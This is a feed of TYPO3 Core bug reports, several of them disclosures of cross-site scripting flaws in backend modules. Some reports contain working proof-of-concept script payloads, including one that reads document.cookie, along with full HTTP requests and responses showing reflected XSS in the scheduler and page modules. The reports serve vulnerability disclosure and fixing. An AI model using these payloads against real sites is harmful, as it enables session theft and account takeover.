<p><b>TYPO3 Forge: Issues</b><br /><a class="external" href="http://forge.typo3.org/">http://forge.typo3.org/</a><br />Feed updated 2021-01-21T09:33:22Z</p>

<p><b>TYPO3 Core - Bug #93335 (Closed): XSS in access permission module</b><br /><a class="external" href="http://forge.typo3.org/issues/93335">http://forge.typo3.org/issues/93335</a><br />2021-01-21T09:33:22Z, Oliver Hader (oliver.hader@typo3.org)</p>
<a name="Steps"></a>
<h2 >Steps<a href="#Steps" class="wiki-anchor">¶</a></h2>
<ul>
<li>having <code>be_groups.title</code> containing XSS</li>
</ul>
<pre>Group&lt;img src="x" onerror="alert(1)"&gt;</pre>
<ul>
<li>open <code>System > Access</code> module for a particular page</li>
<li>click on groupname element</li>
<li>change to group containing XSS in title (prerequisite) &amp; save</li>
<li>click on groupname element again</li>
<li>change to different group</li>
<li>click on "x" icon in order to revert change</li>
</ul>
<p>XSS is executed</p>
<a name="Reasons"></a>
<h2 >Reasons<a href="#Reasons" class="wiki-anchor">¶</a></h2>
<ul>
<li><a class="external" href="https://github.com/TYPO3/TYPO3.CMS/blob/master/Build/Sources/TypeScript/beuser/Resources/Public/TypeScript/Permissions.ts#L84">https://github.com/TYPO3/TYPO3.CMS/blob/master/Build/Sources/TypeScript/beuser/Resources/Public/TypeScript/Permissions.ts#L84</a></li>
</ul>
<pre>buttonSelector.innerHTML = groupnameHtml;</pre>

<p><b>TYPO3 Core - Bug #91334 (Closed): XSS in jQuery &lt;3.5.0</b><br /><a class="external" href="http://forge.typo3.org/issues/91334">http://forge.typo3.org/issues/91334</a><br />2020-05-07T14:20:43Z, Oliver Hader (oliver.hader@typo3.org)</p>
<p><a class="external" href="https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/">https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/</a></p>

<p><b>TYPO3 Core - Bug #84591 (Closed): XSS in ToolbarItems icon rendering</b><br /><a class="external" href="http://forge.typo3.org/issues/84591">http://forge.typo3.org/issues/84591</a><br />2018-04-04T08:24:34Z, Oliver Hader (oliver.hader@typo3.org)</p>
<blockquote>
<p>Today I built a CacheManipulateClass for a customer to flush a few news caches. (Please do not judge this way of flushing caches. I know about clearCacheCmd.)</p>
<p>Context: regular BE login and a sitepackage extension which registers this class.</p>
<p>Proof of Concept: my class adds this identifier</p>
</blockquote>
<pre>
&lt;?php
// Hypothetical namespace for the reporter's sitepackage hook class (not given in the report)
namespace Vendor\Sitepackage\Hooks;

use TYPO3\CMS\Backend\Routing\UriBuilder;
use TYPO3\CMS\Backend\Toolbar\ClearCacheActionsHookInterface;
use TYPO3\CMS\Core\Imaging\IconFactory;
use TYPO3\CMS\Core\Utility\GeneralUtility;

class CacheManipulateClass implements ClearCacheActionsHookInterface
{
    /**
     * Adds a custom entry to the clear-cache toolbar dropdown.
     *
     * @param array $cacheActions
     * @param array $optionValues
     *
     * @return void
     */
    public function manipulateCacheActions(&$cacheActions, &$optionValues)
    {
        $iconFactory = GeneralUtility::makeInstance(IconFactory::class);
        $cacheActions[] = [
            'id' => 'news_clear_cache',
            'title' => 'Flush news caches',
            'description' => 'Clear fluid cache for frontend pages with news',
            'href' => (new UriBuilder())->buildUriFromRoute('news_clear_cache'),
            // PoC: this value is output unescaped by ClearCacheToolbarItem::getDropdown()
            'icon' => '&lt;script&gt;alert(document.cookie);&lt;/script&gt;'
        ];
    }
}
</pre>
<blockquote>
<p>In TYPO3 7.6.x the cache manipulator has the option 'icon' which is handled in TYPO3/v7/typo3/sysext/backend/Classes/Backend/ToolbarItems/ClearCacheToolbarItem.php.<br />In the function getDropdown (line 160) the value <code>$cacheAction['icon']</code> is output without htmlspecialchars().</p>
</blockquote>

<p><b>TYPO3 Core - Bug #82079 (Closed): XSS in scheduler</b><br /><a class="external" href="http://forge.typo3.org/issues/82079">http://forge.typo3.org/issues/82079</a><br />2017-08-10T15:39:53Z, Oliver Hader (oliver.hader@typo3.org)</p>
<p>I would like to inform you about a security issue that I have found in the plugin SCHEDULER of the CMS TYPO3 (checked on version 8.7.3); specifically, it is accessible in the "Scheduler" section of the Backend administrative console.</p>
<p>The Scheduler plugin of TYPO3 is vulnerable to Reflected Cross-Site Scripting in the requests to Add or Edit a task, specifically in the two parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D".</p>
<p><b>Technical Details</b></p>
<p>Below is described the scenario to reproduce the security issue.</p>
<p>Proof of Concept:<br />To replicate the issue an authenticated user (with permission to create/edit tasks) has to click the button "Add-Task" or "Edit-Task" in the Scheduler area.<br />It is then sufficient to grab the request which is being passed to the server and add the payloads to the two vulnerable parameters "tx_scheduler%5Bstart%5D" and "tx_scheduler%5Bend%5D"; the submitted payloads are replicated in the response.</p>
<p>EXAMPLE<br />Payloads:<br /><code>krup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1</code><br /><code>de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag</code></p>
<p>ORIGINAL REQUEST:</p>
<pre>
POST /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 479
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=1500887453&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save
</pre>
<p>PoC REQUEST:</p>
<pre>
GET /typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add&tx_scheduler%5Buid%5D=0&previousCMD=add&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D=TYPO3%5CCMS%5CExtensionmanager%5CTask%5CUpdateExtensionListTask&tx_scheduler%5Btype%5D=1&tx_scheduler%5Btask_group%5D=0&tx_scheduler%5Bstart%5D_hr=11%3A10+24-07-2017&tx_scheduler%5Bstart%5D=15008874533rup3z%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyflbjwmu6m1&tx_scheduler%5Bend%5D_hr=&tx_scheduler%5Bend%5D=de6gi%22%3e%3cscript%3ealert(2)%3c%2fscript%3eh3wq9ysmjag&tx_scheduler%5Bfrequency%5D=&tx_scheduler%5Bmultiple%5D=0&tx_scheduler%5Bmultiple%5D=1&tx_scheduler%5Bdescription%5D=dgfdfagdfag&CMD=save HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://X.X.X.X/typo3/index.php?M=system_txschedulerM1&moduleToken=3cd70c1e7bb08e1f2b0feccf663ed77ba8abb86d&CMD=add
Cookie: be_lastLoginProvider=1433416747; be_typo_user=3c65beedf9f4f132c2bd20ad74d38314
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
</pre>
<p>PoC RESPONSE:</p>
<pre>
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2017 09:35:42 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Mon, 24 Jul 2017 09:35:42 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51666
</pre>
<pre>
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
[...]
&lt;label&gt;Task group&lt;/label&gt;&lt;/abbr&gt;&lt;/span&gt;&lt;div class="form-control-wrap"&gt;&lt;select name="tx_scheduler[task_group]" id="task_class" class="form-control"&gt;&lt;option value="0" title=""&gt;&lt;/option&gt;&lt;/select&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div class="form-section"&gt;&lt;div class="row"&gt;&lt;div class="form-group col-sm-6" id="task_start_col"&gt;&lt;label&gt;&lt;span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_start"&gt;&lt;abbr class="t3-help-teaser"&gt;Start (HH:MM DD-MM-YYYY)&lt;/abbr&gt;&lt;/span&gt;&lt;/label&gt;&lt;div class="form-control-wrap"&gt;&lt;div class="input-group" id="tceforms-datetimefield-task_start_row-wrapper"&gt;&lt;input name="tx_scheduler[start]_hr" value="20:48 11-08-2445" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_start_row"&gt;&lt;input name="tx_scheduler[start]" value="15008874533rup3z"&gt;&lt;script&gt;alert(1)&lt;/script&gt;yflbjwmu6m1" type="hidden"&gt;&lt;span class="input-group-btn"&gt;&lt;label class="btn btn-default" for="tceforms-datetimefield-task_start_row"&gt;&lt;span class="fa fa-calendar"&gt;&lt;/span&gt;&lt;/label&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div class="form-group col-sm-6" id="task_end_col"&gt;&lt;span class="t3-help-link" href="#" data-table="_MOD_system_txschedulerM1" data-field="task_end"&gt;&lt;abbr class="t3-help-teaser"&gt;&lt;label&gt;End (HH:MM DD-MM-YYYY)&lt;/label&gt;&lt;/abbr&gt;&lt;/span&gt;&lt;div class="form-control-wrap"&gt;&lt;div class="input-group" id="tceforms-datetimefield-task_end_row-wrapper"&gt;&lt;input name="tx_scheduler[end]_hr" value="" class="form-control t3js-datetimepicker t3js-clearable" data-date-type="datetime" type="text" id="tceforms-datetimefield-task_end_row"&gt;&lt;input name="tx_scheduler[end]" value="de6gi"&gt;&lt;script&gt;alert(2)&lt;/script&gt;h3wq9ysmjag" type="hidden"&gt;&lt;span class="input-group-btn"&gt;&lt;label class="btn btn-default" for="tceforms-datetimefield-task_end_row"&gt;&lt;span class="fa fa-calendar"&gt;&lt;/span&gt;&lt;/label&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
[...]
</pre>
<p>A screenshot of the PoC is attached to better illustrate the vulnerability.</p>
<p>Vulnerable Versions:<br />TYPO3 8.7.3 and earlier</p>
<p>Checked on TYPO3/8.7.3</p>
<p>I have not received your response to the other two previous reports (I hope to receive at least a response from you). Anyway, I am always available if you need further explanations. Kind regards.</p>

<p><b>TYPO3 Core - Bug #82077 (Closed): XSS in page module</b><br /><a class="external" href="http://forge.typo3.org/issues/82077">http://forge.typo3.org/issues/82077</a><br />2017-08-10T15:35:29Z, Oliver Hader (oliver.hader@typo3.org)</p>
<p>For the attention of the TYPO3 security team,</p>
<p>I would like to inform you about a security issue that I have found in the CMS TYPO3 (checked on versions 8.7.3 and 6.2.30).</p>
<p>Specifically, those versions of TYPO3 are vulnerable to a Reflected Cross-Site Scripting in the "Edit Page" area of the Backend administrative console, for pages which are configured to show the content of other pages.</p>
<p><b>Technical Details</b></p>
<p>Below is described the scenario to reproduce the security issue.</p>
<p>Prerequisite - Configure a page to show content from another page: in the Backend administrative console select "Page" from the left panel, then select a site page in the tree view on the side and go to "Edit Page". Then select the "Appearance" tab and click the "Page" button in the "Replace Content" section in order to add any content to that page, and finally save it.</p>
<p>At this point, in the "Edit Page" area for the aforementioned page a blue rectangle will appear containing a link with the label "Page uses content from ...", and this link is affected by the reflected XSS issue.</p>
<p>Proof of Concept:<br />To replicate the issue it is sufficient to click the aforementioned new link (for 8.7.3 it has the format "/typo3/index.php?M=web_layout&moduleToken=&lt;TOKEN-VALUE&gt;&id=&lt;ID-VALUE&gt;").</p>
<p>Then grab the GET request which is being passed to the server and add the payload to the URL query; the submitted payload is reflected in the corresponding response body.</p>
<p>EXAMPLE (a screenshot of the PoC is attached)<br />Payload: <code>&xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E</code></p>
<p>ORIGINAL REQUEST:</p>
<pre>
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2 HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 12 Jul 2017 07:20:31 GMT
</pre>
<p>PoC REQUEST:</p>
<pre>
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2&xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
</pre>
<p>PoC RESPONSE:</p>
<pre>
HTTP/1.1 200 OK
Date: Wed, 12 Jul 2017 08:15:06 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Wed, 12 Jul 2017 08:15:06 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41399
</pre>
<pre>
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
[...]
&lt;div class="callout callout-info"&gt;&lt;div class="media"&gt;&lt;div class="media-left"&gt;&lt;span class="fa-stack fa-lg callout-icon"&gt;&lt;i class="fa fa-circle fa-stack-2x"&gt;&lt;/i&gt;&lt;i class="fa fa-info fa-stack-1x"&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="media-body"&gt;&lt;h4 class="callout-title"&gt;page1&lt;/h4&gt;&lt;div class="callout-body"&gt;
 Page uses content from this page: &lt;a href="/typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=1&xss"&gt;&lt;script&gt;alert('xss')&lt;/script&gt;="&gt;page1 (PID 1)&lt;/a&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
[...]
</pre>
<p>Vulnerable Versions:<br />TYPO3 8.7.3 and earlier</p>
<p>Checked on:<br />TYPO3/8.7.3<br />TYPO3/6.2.30 (for the 6.2.x versions the affected link is "/typo3/sysext/cms/layout/db_layout.php?id=1&clear_cache=1")</p>

<p><b>TYPO3 Core - Bug #78743 (Rejected): Wrong translation behavior for pages/pages_language_overlay</b><br /><a class="external" href="http://forge.typo3.org/issues/78743">http://forge.typo3.org/issues/78743</a><br />2016-11-18T13:30:30Z, Oliver Hader (oliver.hader@typo3.org)</p>
<ol>
<li>on localizing a page, references of <code>pages.media</code> are not copied to <code>pages_language_overlay.media</code> in DataHandler if <code>localizeChildrenAtParentLocalization</code> is defined in TCA</li>
<li>RootlineUtility is not capable of resolving overlays correctly, ignores <code>l10n_mode</code> and uses custom reference queries -> RelationHandler could be used here</li>
</ol>

<p><b>TYPO3 Core - Bug #72475 (Closed): XSS in belog module</b><br /><a class="external" href="http://forge.typo3.org/issues/72475">http://forge.typo3.org/issues/72475</a><br />2015-12-30T13:23:09Z, Oliver Hader (oliver.hader@typo3.org)</p>
<p>The belog module, accessible for admin users, is vulnerable to XSS.</p>
<p>Requirements</p>
<p>a) create a backend user having the name <code>te&lt;b&gt;st&lt;/b&gt;</code><br />b) create a workspace record having the title <code>work&lt;b&gt;space&lt;/b&gt;</code></p>
<p>PoC</p>
<ul>
<li>switch to the created user</li>
<li>switch to the created workspace</li>
<li>modify or create any content</li>
<li>open the log at System>Log and see the unescaped contents of the user and workspace</li>
</ul>

<p><b>TYPO3 Core - Task #59874 (Closed): Wrong sys_refindex for deleted child records</b><br /><a class="external" href="http://forge.typo3.org/issues/59874">http://forge.typo3.org/issues/59874</a><br />2014-06-25T13:17:48Z, Oliver Hader (oliver.hader@typo3.org)</p>

<p><b>TYPO3 Core - Task #59853 (Closed): Wrong nesting of deleted versioned child records</b><br /><a class="external" href="http://forge.typo3.org/issues/59853">http://forge.typo3.org/issues/59853</a><br />2014-06-24T17:25:16Z, Oliver Hader (oliver.hader@typo3.org)</p>
<p>Scenario/Actions:</p>
<ul>
<li>having an IRRE parent-child structure (live)</li>
<li>backend, workspace selected</li>
<li>delete a child-record and save</li>
<li>the workspace module shows wrong nesting for deleted records</li>
</ul>
<p>Reason:<br />The reference index entry for the deleted element uses the live id instead of the versioned id.</p>
<p>DataSet:<br /><code>typo3/sysext/workspaces/Tests/Functional/DataHandling/IRRE/ForeignField/Modify/DataSet/modifyParentNDeleteHotelChild.csv</code> (sys_refindex not checked there)</p>

<p><b>TYPO3 Core - Bug #39958 (Closed): Wrong name attribute in custom user rendered items</b><br /><a class="external" href="http://forge.typo3.org/issues/39958">http://forge.typo3.org/issues/39958</a><br />2012-08-19T13:43:03Z, Oliver Hader (oliver.hader@typo3.org)</p>
<p>Configuration items/properties that use a user function to render the corresponding values and options (as, e.g., saltedpasswords does in the Core) have a wrong name attribute.</p>
<p>The information to be delivered shall be:</p>
<ul>
<li>fieldName: Extbase prefixed form name</li>
<li>fieldValue: the value of the field to be shown</li>
<li>propertyName: Name of the property, e.g. "some.setting"</li>
</ul>

<p><b>TYPO3 Core - Bug #39952 (Closed): Wrong nested extension configuration handling</b><br /><a class="external" href="http://forge.typo3.org/issues/39952">http://forge.typo3.org/issues/39952</a><br />2012-08-19T12:12:40Z, Oliver Hader (oliver.hader@typo3.org)</p>
<p>Nested default configurations and the specific system configuration of an extension are not merged correctly. This affects both reading configuration properties and persisting them.</p>

<p><b>TYPO3 Core - Bug #36841 (Closed): Wrong query in RecordCollectionRepository</b><br /><a class="external" href="http://forge.typo3.org/issues/36841">http://forge.typo3.org/issues/36841</a><br />2012-05-04T13:11:56Z, Oliver Hader (oliver.hader@typo3.org)</p>
<p>If <code>t3lib_collection_RecordCollectionRepository::queryMultipleRecords()</code> is called without any argument, the SQL statement is wrong since <code>t3lib_BEfunc::deleteClause()</code> starts with "AND".</p>

<p><b>TYPO3 Core - Bug #36242 (Closed): Wrong or missing XCLASS definitions</b><br /><a class="external" href="http://forge.typo3.org/issues/36242">http://forge.typo3.org/issues/36242</a><br />2012-04-17T19:46:30Z, Oliver Hader (oliver.hader@typo3.org)</p>
<p>Several classes in <code>t3lib/file/</code> have wrong or missing XCLASS definitions.</p>

<p><b>TYPO3 Core - Bug #21727 (Closed): Wrong encoding of labels in t3editor</b><br /><a class="external" href="http://forge.typo3.org/issues/21727">http://forge.typo3.org/issues/21727</a><br />2009-11-28T17:42:35Z, Oliver Hader (oliver.hader@typo3.org)</p>
<p>The encoding of labels in t3editor is wrong and will deliver empty labels if special chars appear there and a non-UTF-8 encoding is used.</p>
<p>(issue imported from #M12825)</p>

<p><b>TYPO3 Core - Bug #25507 (Closed): Wrong syntax highlighting in wrong context</b><br /><a class="external" href="http://forge.typo3.org/issues/25507">http://forge.typo3.org/issues/25507</a><br />2007-11-26T15:46:42Z, Oliver Hader (oliver.hader@typo3.org)</p>
<p>Examples of code snippets tested:</p>
<pre>
10.value = My.TEXT.file.txt
5.file = EXT:whatever/res/header.jpg
</pre>
<p>In these examples the "TEXT" and "header" words get highlighted but shouldn't because they are used in string context and not as TypoScript keywords/properties.</p>
<p>(issue imported from #M6834)</p>